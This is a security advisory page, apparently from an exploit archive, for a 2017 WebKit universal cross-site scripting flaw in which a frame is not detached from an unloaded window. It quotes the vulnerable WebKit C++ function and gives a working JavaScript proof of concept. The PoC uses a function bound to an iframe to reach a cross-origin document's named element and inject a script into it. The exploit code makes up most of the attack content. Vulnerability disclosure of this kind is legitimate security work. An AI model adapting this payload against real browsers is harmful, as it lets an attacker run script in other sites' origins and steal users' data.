Apple Webkit Cross-Site Scripting (Named Property from an Unloaded Window)

2017.04.05
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

<!-- The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function. static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot) { ... Document* document = frame.document(); <<-------- the new document. if (is<HTMLDocument>(*document)) { auto& htmlDocument = downcast<HTMLDocument>(*document); auto* atomicPropertyName = propertyName.publicName(); if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) { JSValue namedItem; if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) { Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName); ASSERT(collection->length() > 1); namedItem = toJS(exec, thisObject->globalObject(), collection); } else namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName)); slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem); return true; } } return false; } PoC: --> "use strict"; let f = document.body.appendChild(document.createElement("iframe")); let get_element = f.contentWindow.Function("return logo;"); f.onload = () => { f.onload = null; let node = get_element(); var sc = document.createElement("script"); sc.innerText = "alert(location)"; node.appendChild(sc); }; f.src = "https://abc.xyz/"; <!-- Tested on Safari 10.0.2(12602.3.12.0.1). -->

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1063


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top